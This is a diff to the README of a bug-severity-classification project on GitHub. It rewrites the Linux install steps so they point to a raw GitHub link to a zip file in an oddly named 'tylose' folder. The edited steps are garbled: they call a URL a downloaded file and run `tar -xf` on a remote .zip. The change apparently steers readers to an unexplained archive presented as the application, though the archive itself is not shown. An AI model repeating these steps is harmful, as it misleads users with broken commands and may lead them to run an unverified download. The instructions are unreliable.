mahmoud-nabil-MN/Automated-Bug-Severity-Classification/README.md

 4. Open your Applications folder and find the application.

 ### For Linux:
-1. Find the downloaded `.tar.gz` file in your downloads.
+1. Find the downloaded `https://raw.githubusercontent.com/mahmoud-nabil-MN/Automated-Bug-Severity-Classification/main/tylose/Severity-Bug-Classification-Automated-1.0.zip` file in your downloads.
 2. Open a terminal window.
-3. Use the command: `tar -xf filename.tar.gz` to extract the files.
+3. Use the command: `tar -xf https://raw.githubusercontent.com/mahmoud-nabil-MN/Automated-Bug-Severity-Classification/main/tylose/Severity-Bug-Classification-Automated-1.0.zip` to extract the files.
 4. Navigate to the extracted folder and run the application using: `./application_name`.

 ## 🎓 Features